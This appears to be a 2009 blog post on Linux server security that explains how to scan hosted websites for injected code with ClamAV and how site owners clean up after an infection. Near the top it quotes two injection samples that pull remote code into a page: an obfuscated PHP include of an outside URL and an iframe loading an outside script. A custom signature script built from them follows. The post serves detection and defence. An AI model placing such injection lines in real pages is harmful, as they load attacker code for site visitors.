Published on: April 21, 2009 by George K.
Do you really need to run a virus scan to ensure Linux server security? Sometimes, yes. With the recent high volume of iframe, PHP include and JS injections, it seems we need to scan site pages for injected code like the samples below.
< ? php include(urldecode("%68%74%74%70%3a%2f%2f%62%75%79%34%6d%65%2e%69%6e%66%6f%2f%73%63%72%2f%31%30%2e%74%78%74")); ? >
< iframe src=http://ms.nesseseni.cn/src.js >< /iframe >
Below are a few URLs which could help you in the process
You can install ClamAV, an open-source antivirus, and run a ClamAV scan to make sure that the website is not affected. On a cPanel server, the command below scans the website files of every user.
clamscan -i -r --remove /home/*/public_html/
Why would I recommend ClamAV over paid antivirus products? For the obvious reason that you can edit ClamAV rules to include more iframe detection rules. Just write new regex rules in the ClamAV virus DBs and you have the situation under control, at least for code matching those iframe patterns.
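One way to add such rules, as an added example that is not from the original post: it uses ClamAV's extended body signatures (a `.ndb` file with one `Name:TargetType:Offset:HexSignature` per line) rather than regexes, built from the two injection strings shown above. The signature and function names are made up for illustration.

```shell
#!/bin/sh
# Added example: local ClamAV signatures for the injection strings in this post.
# Signature names (Local.*) and function names are illustrative, not ClamAV's.

# Emit one extended-format signature line: Name:TargetType:Offset:HexSignature
# TargetType 0 = any file type, Offset * = anywhere in the file.
# The match is byte-exact, so it is case-sensitive.
make_ndb_sig() {
    name=$1
    hex=$(printf '%s' "$2" | od -An -v -tx1 | tr -d ' \n')
    printf '%s:0:*:%s\n' "$name" "$hex"
}

# Write the local signature database to the path given as $1.
write_local_db() {
    {
        # PHP include of a urldecode()'d string that starts with "http"
        make_ndb_sig Local.PHP.UrldecodeInclude 'include(urldecode("%68%74%74%70'
        # iframe with an unquoted remote src, as in the sample above;
        # deliberately broad, so expect hits on legitimate iframes too
        make_ndb_sig Local.HTML.IframeRemoteSrc '<iframe src=http://'
    } > "$1"
}

# Scan a directory tree using only the local signatures.
# Report-only (-i -r, no --remove) so every hit can be reviewed first.
scan_with_local_sigs() {
    dbdir=$(mktemp -d) || return 2
    write_local_db "$dbdir/local.ndb"   # clamscan picks the format from .ndb
    clamscan -d "$dbdir/local.ndb" -i -r "$1"
    status=$?                           # 0 = clean, 1 = match found
    rm -rf "$dbdir"
    return "$status"
}

# Usage: sh local-sigs.sh /home/someuser/public_html
if [ "$#" -ge 1 ]; then
    scan_with_local_sigs "$1"
fi
```

To make the signatures part of every scan, place the generated `local.ndb` in ClamAV's database directory instead of passing it with `-d`.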
Here I was talking about Linux server security. Once a site is infected, there are a few things the client has to do as well.
1. Scan your machine as well as your webmaster's with anti-virus and anti-spyware tools.
2. Once you are sure your computer is clean, change all site passwords. (You might want to change computer and network passwords too.)
3. Now keep the new passwords secure. Don't use the auto-upload features of your WYSIWYG editors or FTP browsers. Enter passwords every time you upload new content instead. Use SFTP instead of FTP if possible. Only a few hosts offer SFTP though.
4. If your site was flagged by Google at http://www.google.com/safebrowsing/diagnostic, request a malware review via Webmaster Tools.
5. Regularly check your site with diagnostic tools of your choice (like Unmask Parasites) to be sure your site is clean.
Category : Linux, Security